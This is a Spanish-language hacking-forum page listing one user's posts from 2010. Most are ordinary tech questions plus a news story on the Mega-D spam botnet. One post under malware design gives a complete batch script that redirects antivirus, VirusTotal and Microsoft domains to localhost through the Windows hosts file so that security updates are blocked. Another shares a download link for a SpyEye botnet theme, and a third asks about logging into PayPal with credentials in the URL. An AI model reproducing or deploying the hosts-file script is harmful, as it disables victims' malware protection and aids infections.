elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


  Mostrar Temas
Páginas: 1 2 3 [4] 5 6 7
31  Comunicaciones / Dispositivos Móviles (PDA's, Smartphones, Tablets) / Problema con iphone 2g en: 31 Diciembre 2010, 21:13 pm
  Le doy a cambiar fecha y hora y al darle, me vuelve a menu
32  Seguridad Informática / Análisis y Diseño de Malware / Bloquear actualizaciones de antivirus ¿aun funciona esto? en: 26 Diciembre 2010, 16:22 pm
  

 no lo digo porque el code este detectado, me refiero a su utilidad, creo que continuamente van cambiando los servidores con los que actualizan, sabeis los nombres de algunos?
Código:
@echo off
set hosts=%windir%\System32\drivers\etc\hosts
echo. >> %hosts%
echo 127.0.0.1 avp.com >> %hosts%
echo 127.0.0.1 ca.com >> %hosts%
echo 127.0.0.1 customer.symantec.com >> %hosts%
echo 127.0.0.1 dispatch.mcafee.com >> %hosts%
echo 127.0.0.1 download.mcafee.com >> %hosts%
echo 127.0.0.1 f-secure.com >> %hosts%
echo 127.0.0.1 kaspersky.com >> %hosts%
echo 127.0.0.1 kaspersky-labs.com >> %hosts%
echo 127.0.0.1 liveupdate.symantec.com >> %hosts%
echo 127.0.0.1 liveupdate.symantecliveupdate.com >> %hosts%
echo 127.0.0.1 mast.mcafee.com >> %hosts%
echo 127.0.0.1 mcafee.com >> %hosts%
echo 127.0.0.1 microsoft.com >> %hosts%
echo 127.0.0.1 my-etrust.com >> %hosts%
echo 127.0.0.1 nai.com >> %hosts%
echo 127.0.0.1 networkassociates.com >> %hosts%
echo 127.0.0.1 pandasoftware.com >> %hosts%
echo 127.0.0.1 rads.mcafee.com >> %hosts%
echo 127.0.0.1 secure.nai.com >> %hosts%
echo 127.0.0.1 securityresponse.symantec.com >> %hosts%
echo 127.0.0.1 sophos.com >> %hosts%
echo 127.0.0.1 symantec.com >> %hosts%
echo 127.0.0.1 trendmicro.com >> %hosts%
echo 127.0.0.1 updates.symantec.com >> %hosts%
echo 127.0.0.1 update.symantec.com >> %hosts%
echo 127.0.0.1 us.mcafee.com >> %hosts%
echo 127.0.0.1 viruslist.com >> %hosts%
echo 127.0.0.1 virustotal.com >> %hosts%
echo 127.0.0.1 www.avp.com >> %hosts%
echo 127.0.0.1 www.f-secure.com >> %hosts%
echo 127.0.0.1 www.grisoft.com >> %hosts%
echo 127.0.0.1 www.kaspersky.com >> %hosts%
echo 127.0.0.1 www.mcafee.com >> %hosts%
echo 127.0.0.1 www.microsoft.com >> %hosts%
echo 127.0.0.1 www.moneybookers.com >> %hosts%
echo 127.0.0.1 www.my-etrust.com >> %hosts%
echo 127.0.0.1 www.nai.com >> %hosts%
echo 127.0.0.1 www.networkassociates.com >> %hosts%
echo 127.0.0.1 www.pandasoftware.com >> %hosts%
echo 127.0.0.1 www.sophos.com >> %hosts%
echo 127.0.0.1 www.symantec.com >> %hosts%
echo 127.0.0.1 www.trendmicro.com >> %hosts%
echo 127.0.0.1 www.virustotal.com >> %hosts%
33  Foros Generales / Dudas Generales / backtrack login error en: 26 Diciembre 2010, 00:13 am
   No es la primera vez que me pasa, hace tiempo lo puse en un dvd y el login: login root , toor me daba error, ahora despues de unos meses me lo descargo de nuevo, lo pongo en un usb y:

login root
pass: toor

y error otra vez.

 lo pongo en dudas generales ya que aqui tambien se hacen dudas sobre otros S.0

  #no tengo tildes ahora xD
34  Foros Generales / Foro Libre / Una imagen vale mas que mil palabras en: 20 Diciembre 2010, 16:31 pm
35  Programación / PHP / ?Redireccionar a otra url de otro dominio sin cambiar la url? en: 14 Diciembre 2010, 22:41 pm

  Un ejemplo:

   visito www.elhacker.net
   pero quiero que se redireccione a : www.ohmygod.com

   Pero en la url que aparece en el navegador siga siendo  www.elhacker.net


  Gracias de antemano.
36  Programación / Programación Visual Basic / SendKeys no me funciona en: 8 Diciembre 2010, 22:34 pm

  Utilizo una versión portable de vb6
  El código:

Código:
 Private Sub Form_Load()
Shell "cmd.exe /c start http://google.com"
SendKeys "{F11}"
End Sub

  Mi intención es que se me abra el navegor en pantalla completa al lanzar la tecla f11
37  Foros Generales / Noticias / Estados unidos atrapa a spammer ruso que hacia 1/3 del spam que recibimos. en: 8 Diciembre 2010, 00:12 am



Un hombre ruso que el FBI cree que es responsable de un tercio del correo electrónico no deseado o spam que recibes en tu bandeja de entrada será procesado este lunes en la Corte de Milwaukee, Wisconsin, en Estados Unidos. El viernes pasado, el hombre se declaró no culpable de los cargos que se le adjudican.

De acuerdo con los documentos de la Corte y declaraciones juradas del FBI, los investigadores comenzaron a rastrear a Mega-D, una red de computadoras controladas por un software (botnet) que era la primera fuente de envío de spam para vender productos falsificados. También investigaron al cerebro detrás de esto, Oleg Nikolaenko.

"Mega-D era posiblemente la mayor botnet en el mundo, responsable del 32% de todo el spam”, indicaron los documentos de la Corte. "Los investigadores de seguridad estimaron que esta red era capaz de enviar 10,000 millones de este tipo de correos al día".

Los documentos mostraron el alcance del círculo de falsificación y los intentos de las autoridades por rastrear a Nikolaenko.

Un vistazo a la magnitud de la operación de Nikolaenko puede apreciarse en los documentos de la Corte que alegan que él recibió un pago de 459,098.47 dólares entre el 4 de junio y el 5 de diciembre de 2007, resultado del spam de aquellos que vendían artículos desde medicamentos para evitar la disfunción eréctil y otras recetas falsificadas, remedios herbales y hasta relojes Rolex falsos.

Uno de los relojes fue una pista para encontrar al acusado. El camino hacia Nikolaenko empezó cuando un vendedor de Rolex falsificados dijo a las autoridades, después de ser arrestado, que el pagó mas de dos millones de dólares para pagar por spam que promocionara su producto. Les dio información que resultó en un sendero de información que llevó a los agentes a través de varios continentes, entre distintas direcciones de correo electrónico y sitios web y, eventualmente, a Nikolaenko.

Los agentes del FBI y de la Comisión Federal de Comercio estadounidense han estado vigilándolo desde al menos 2007, de acuerdo con los documentos. Esto incluyó dos viajes que realizó a Estados Unidos el año pasado.

Donde por fin pudieron echarle el guante fue en Las Vegas, Nevada, a donde viajó para una exhibición de autos. Fue arrestado el 4 de noviembre.

Christopher Van Wagner, el abogado de Nikolaenko, no pudo ser contactado de inmediato para que diera sus comentarios. Pero dijo al Milwaukee Journal Sentinel que hasta ahora, los cargos contra su cliente son sólo acusaciones.

"Estamos preparados para presentar una defensa rigurosa", dijo.
CNN
38  Seguridad Informática / Hacking Wireless / Haciendo una pruebas con el router de mi vecino con permiso ^^ problema puertos en: 22 Noviembre 2010, 01:56 am
  Pues miren, fui a pedirle sal a mi vecino y no se por qué me ha dicho que si podría ser capaz de abrirle los puertos para el emule y etc... y le he dicho que encantado ya que el se había enfadado con el técino de telefónica porque no le ofrecieron los megas que el pagaba.

  Pues accedo a :192.168.1.1/

  contraseña por defecto, login correcto, entro en nat, abro all ports, hago análisis de puertos y me dice que estan cerrados.
  (también he probado puertos individuales)

modifico: tengo firewall abierto creo, quitandolo*
LO HE QUITADO Y SIGUE SIN ABRIRSE
39  Seguridad Informática / Análisis y Diseño de Malware / [DESCARGA] Theme para botnet spyeye super mario bross en: 14 Noviembre 2010, 18:56 pm
  Bueno, hackers grises y negros minoritarios del hacker.net aquí os dejo un theme de la botnet spyeye.
  El builder lo he quitado por razones de inseguridad ^^
http://www.multiupload.com/DWC2G1KYUM


  si el link se rompe mandarme mp
40  Foros Generales / Dudas Generales / Entrar a paypal desde url? en: 11 Noviembre 2010, 02:10 am
http://www.paypal.com/us/cgi-bin/webscr?cmd=_login-submit&dispatch=5885d80a13c0db1f35bed810ca29224194ca8b1b097b671988f0ad0034239f22&login_cmd=&login_params=&login_email= & oculto@live.com & "&login_password=" & clave de ejemplo & "&submit.x=Log+In&form_charset=UTF-8&browser_name=Firefox&browser_version=2&operating_system=Windows&iconix_installed=0")

quien me lo corrige?
Páginas: 1 2 3 [4] 5 6 7
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines